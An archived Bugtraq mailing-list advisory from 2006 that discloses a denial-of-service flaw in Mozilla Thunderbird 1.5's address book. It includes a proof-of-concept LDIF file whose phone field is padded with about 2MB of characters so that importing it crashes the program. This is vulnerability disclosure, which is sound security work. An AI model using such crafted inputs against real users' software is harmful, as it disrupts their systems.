Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Mozila Thunderbird 1.5 Address Book DoS
From: Javor Ninov <drfrancky () securax org>
Date: Tue, 21 Feb 2006 18:11:22 +0200
Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky () securax org,mail=drfrancky () securax org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky () securax org
cn: POC by DrFrancky () securax org
mozillaNickname: DrFrancky
mail: drfrancky () securax org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------

Credits:
DrFrancky
drfrancky () securax org

Attachment: signature.asc
Description: OpenPGP digital signature

  By Date           By Thread  

Current thread:
  • Mozila Thunderbird 1.5 Address Book DoS Javor Ninov (Feb 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]